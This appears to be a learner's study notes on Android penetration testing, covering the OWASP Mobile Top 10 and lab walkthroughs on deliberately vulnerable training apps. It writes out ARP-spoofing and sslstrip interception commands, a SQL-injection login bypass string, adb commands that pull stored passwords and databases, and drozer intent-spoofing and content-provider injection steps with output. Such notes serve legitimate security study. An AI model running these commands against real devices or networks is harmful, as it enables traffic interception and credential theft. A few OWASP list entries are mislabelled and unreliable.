These are the notes that I took while I was learning Android Pentest. Will updated some methodology in soon!
- media player
- Activity Manager
- Window Manager
- Content Providers
- View System
- Notification Manager
- Package Manager
- Telephony Manager
- Resource Manager
- Location Manager
- Surface Manager
- Media Framework
- Audio Manager
Hardware Abstraction Layer
- Display Driver
- Camera Driver
- Bluetooth Driver
- Shared Memory Driver
- Binder(IPC) Driver
- USB Driver
- Kernel Driver
- Wifi Driver Audio Drivers
- Power Managerment
Common Mobile Application Functions
- Online Banking(Barclays)
- Social Network(Facebook)
- Streaming(Skey go)
- Instant Messaging(Whatsapp)
- Voice Chat(Skype)
- File sharing(Dropbox)
- Games(angry bird)
Documents Stroage Applications allowing user to access sensitive business documents on demand
Travel and expenses applications allowing users to create , store and upload expenses to internal system
HR applications allowing user to access the payroll, time , slips , holiday, informations and other sensitive functionality
Internal service applications such as mobile applications that have been optimized to provide an internal resource such as the coperate internet
Internal instant messaging applications allowing users to chat in real time with other users regardless of location
Client Side Vulnerability
Insecure data storage
This category of the vulnerability incoperates the various defects that lead to an application’s stroing data on the mobile device in either cleartext and obfuscated format, using a hard-coded key , or any other means that can be trivially reversed by an attacker.
Insecure transmission of data
This involves any instance whereby an application does not use transport layer encryption to protect data in transit. It also includes cases where transport layer encryption is used but has been implemented in an insecure manner.
Lack of binary protections
This flaws means that an application does not employ any form of protection mechanism to complicate reverse engineering , malicious tampering or debugging.
This category of vulnerability describes secnarios where untruested data is sent to an application and handled in unsafe manner . Typical origins of injection include other applications on the device and input populated into the application from the server.
Hard-coded password keys
This flaws arise when the developer embeds a sensitive piece of information such as password or an encryption key into the application.
Leakage of sensitive data
This involve cases where an application unintentionally leaks sensitive data though a side channel. This sepcifically includes data leakages that arise though use of a framework or OS and occur without the developer’s knowledge.
OWASP Mobile Top 10 risks from 2014
- M1 – Weak Server-Side Control
- M2 – Insecure Data Storage
- M3 – Insufficient Data Storage
- M4 – Unintended Data Leakage
- M5 – Poor Authorization and Authentication
- M6 – Broken Cryptography
- M7 – Client Side Injection
- M8 – Security Decisions via untrusted input
- M9 – Improper session handling
- M10- Lack of binary protections
OWASP Mobile Top 10 risks from 2016
- M1 – Improper Platform Usage
- M2 – Insecure Data Storage
- M3 – Insecure Communication
- M4 – Insecure Authentication
- M5 – Insufficient Cryptography
- M6 – Insecure Authorization
- M7 – Client Code Quality
- M8 – Code Tampering
- M9 – Reverse Engineering
- M10 – Extraneous Functionality
OWASP Top 10 mobile security tools
- iMAS – Created by MITRE COPORTION, this project is an open source secure application framework for ios
- GoatDroid – self‐contained training environment for Android applications.
- iGoat – Similar to the goatdroid project
- Damn Vulnerable IOS
Browser-based applications – The term describes applications that are usually a “mobile friendly” clone of the main site and loaded via the device’s browser.
Hybrid applications – The term refer to mobile applications that are a native wrapper for a webview and and often use a framework to access native device functionally.
Each app runs inside it’s own sandbox.
One App cannot access the data associated with other apps.
/data/data/ is the directory where all app data is located.
Connecting to adb with bluestacks
adb connect localhost:5555 adb -s emulator-5554 shell
Start Learning OWASP Top 10 from 2014
M2-Insecure Data Storage
Android provides various ways to save app data.
It is up to the developer – What kind of data. How much data etc.
- SQLite Databases
- Internal Storage
- External Storage
- Using network connection
saving username and password without encrypting is not safe
OnePlus3T:/data/data/com.ist.challenge3/shared_prefs # cat userdetails.xml <?xml version='1.0' encoding='utf-8' standalone='yes' ?> <map> <string name="username">ist</string> <string name="password">ist</string> </map> OnePlus3T:/data/data/com.ist.challenge3/shared_prefs #
reading files from adb
adb shell "su -c cat /data/data/com.ist.challenge4/databases/SQLINJECTION.db" > SQLINJECTION.db
M3-Insuffcient Transport Layer Protection
It is pretty common to exchange data between the Client and Server.
Many apps do not use SSL for transmitting data.
Many Apps trust Self Signed Certificates.
It is recommended to use certificates signed by a trusted CA provider
An attacker may evaesdrop to get sensitive data.
There are many possible attacks scenarios
Below are the few scenarios:
- MITM with Burpsuite – Intercepting HTTP Traffic
- MITM with Burpsuite – Intercepting SSL Traffic
- Real world MITM attacks with arp spoofing
- Passive data analysis with tcpdump and wireshark
MITM with Burpsuite – Intercepting HTTP Traffic
Configure the Proxy Server for bluestack
cd to bluestacks folder
C:\Program Files\BlueStacks>HD-ConfigHttpProxy.exe set 192.168.189.1 8080 connect to specified proxy C:\Program Files\BlueStacks>HD-ConfigHttpProxy.exe reset reset/stop using proxy
Vulnerable url – http://demo.testfire.net/login.jsp
x' or 'x'='x
MITM with Burpsuite – Intercepting SSL Traffic
just adding certificate
Real World MITM attacks with arp spoofing
echo "1" > /proc/sys/net/ipv4/ip_forward sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <lientenPort> sudo sslstrip.py -l <listenPort> sudo arpspoof -i <interface> -t <targetip> <gateway>
M4-Unintended Data Leakage
When an application processes sensitive information taken as input from the user or any other source,it may result in placing data in an insecure location in the device.This insecure location could be accessible to other malicious apps running on the same device, thus leaving the device in a serious risk state.
- URL Caching(Both Request and response)
- Keyboard Press Caching
- Copy/Paste Buffer Caching
- Application backgrounding
- HTML5 data storage
- Browser cookie objects
- Analytics data sent to 3rd parties
Unintended Data Leakage — Reading the clipboard
The software will paste the everything that u copy from anywhere.
That is the problem
Unintended Data Leakage — Logging
using logcat from adb
adb logcat | grep password
M5-Poor Authentication and Authorization
It has got various forms of attack vectors.
Due to offline usage requirements, mobile apps may be required to perform local authentication or authorization checks within the mobile app’s code.
But, it is always recommended to all the processing at server side and then load data onto the mobile.
Due to usability requirements,mobile apps allow for passwords that are 4 digits long.
They can easily brute forced.
Even if the passwords are stored as hashes on the server, an attacker can easily crack them using rainbow table attacks if the file where hashes are stored is compromised.
the mobile app use the encryption and decrption that fundamentally falwed and can be exploited by the adversy to decrypt sensitive data.
Poor key Management Processes
Including the keys in the same attacker-readable directory as the encrypted content.
Avoid the use of hardcoded keys within the binary.
Creating custom encryption protocols
use apktool to decompile source code if there is any hash that can be cracked. It will be vulnerable to broken cryptography.
M7-Clientside Attack — SQL Injection at Client Side
x' or 'x'='x
and can easily bypass login without username and password
M7-Frame Injection in webviews
M8-Security Decisions via untrusted inputs — Intent Spoofing
The mobile application can accept data from all kinds of sources.
am – activity manager
it will be exported as True we can easily exploited
am start -n com.ist.challenge1/.Welcome
M9-Improper Session Handling
Session related attacks come into picture if, the seesion id is compromised , or not invalidated properly in the backend. Insecure token creation and session timeouts are not implemented properly.
M10-Lack of Binary Exploitation
Reversing adnroid apps with APKTOOL
Reversing android apps with dex2jar
Exploiting debuggable apps using JDB
Setting Up Drozer
Drozer is a framework for Android Security assessments developed by MWR labs.
Drozer allow to assume the role of an Android app and to interact with other apps, through Android’s Inter-Process Communication(IPC) mechanism and the underlying operating system.
Has got nice modules such as leaking content providers, SQL Injection, LFI.
set up for port forwarding
adb -s emulator-5554 forward tcp:31415 tcp:31415
drozer console connect
Getting the list of all modules in drozer
Getting the list of all packages installed
to run specific package
run app.package.list -f challenge1
Getting package information
run app.package.info -a [package name]
dz> run app.package.info -a com.ist.challenge1 Package: com.ist.challenge1 Application Label: Challenge1 Process Name: com.ist.challenge1 Version: 1.0 Data Directory: /data/user/0/com.ist.challenge1 APK Path: /data/app/com.ist.challenge1-2/base.apk UID: 10059 GID:  Shared Libraries: null Shared User ID: null Uses Permissions: - None Defines Permissions: - None
Finding out the attack surface
run app.package.attacksurface [package name]
dz> run app.package.attacksurface com.ist.challenge1 Attack Surface: 2 activities exported 0 broadcast receivers exported 0 content providers exported 0 services exported is debuggable
Listing out activities in a package
run app.activity.info -a [packagename]
Finding the content providers of a package
run scanner.provider.finduris -a [packagename]
Querying content providers
run app.provider.query [URI]
Inserting data into content providers
run app.provider.insert [URI] [-type] column name [value]
Intent Spoofing with drozer
first it check the activity and just run activity
dz> run app.activity.info -a com.ist.challenge1 Package: com.ist.challenge1 com.ist.challenge1.MainActivity Permission: null com.ist.challenge1.Welcome Permission: null
dz> run app.activity.start --component com.ist.challenge1 com.ist.challenge1.Welcome
Exploiting Content Provider Leakage
Listing out activities in a package
run app.activity.info -a [package name]
Finding the secret content providers of a package.
run scanner.provider.finduris -a [package name]
run app.package.list -f vul
dz> run app.package.attacksurface com.androidpentesting.vulcontentprovider Attack Surface: 1 activities exported 0 broadcast receivers exported 1 content providers exported 0 services exported is debuggable
dz> run scanner.provider.finduris -a com.androidpentesting.vulcontentprovider Scanning com.androidpentesting.vulcontentprovider... Able to Query content://com.androidpentesting.vulcontentprovider.data/userdetails/ Able to Query content://com.androidpentesting.vulcontentprovider.data/ Able to Query content://com.androidpentesting.vulcontentprovider.data/userdetails Able to Query content://com.androidpentesting.vulcontentprovider.data Accessible content URIs: content://com.androidpentesting.vulcontentprovider.data/ content://com.androidpentesting.vulcontentprovider.data/userdetails/ content://com.androidpentesting.vulcontentprovider.data content://com.androidpentesting.vulcontentprovider.data/userdetails
dz> run scanner.provider.finduris -a com.androidpentesting.vulcontentprovider Scanning com.androidpentesting.vulcontentprovider... Able to Query content://com.androidpentesting.vulcontentprovider.data/userdetails/ Able to Query content://com.androidpentesting.vulcontentprovider.data/ Able to Query content://com.androidpentesting.vulcontentprovider.data/userdetails Able to Query content://com.androidpentesting.vulcontentprovider.data Accessible content URIs: content://com.androidpentesting.vulcontentprovider.data/ content://com.androidpentesting.vulcontentprovider.data/userdetails/ content://com.androidpentesting.vulcontentprovider.data content://com.androidpentesting.vulcontentprovider.data/userdetails dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/ | id | name | bankdetails |
dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/ | id | name | bankdetails | dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/ | id | name | bankdetails | | 1 | ch4n | ch4n |
OnePlus3T:/ $ content query --uri content://com.androidpentesting.vulcontentprovider.data/userdetails/ Row: 0 id=1, name=ch4n, bankdetails=ch4n OnePlus3T:/ $
SQL Injection Content Provider
dz> run scanner.provider.injection --uri content://com.androidpentesting.vulcontentprovider.data/userdetails/ Not Vulnerable: No non-vulnerable URIs found. Injection in Projection: content://com.androidpentesting.vulcontentprovider.data/userdetails/ Injection in Selection: content://com.androidpentesting.vulcontentprovider.data/userdetails/ dz>
Check sqli is vulnerable or not
dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/ --selection "'" unrecognized token: "')" (code 1): , while compiling: SELECT * FROM users WHERE (')
dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/ | id | name | bankdetails | | 1 | ch4n | ch4n |
Firebase Database Takeover Vulnerability
Highly recommend to check this one. It is free and super cool.
- SQLite Browser
Hackerone Android Report And Resources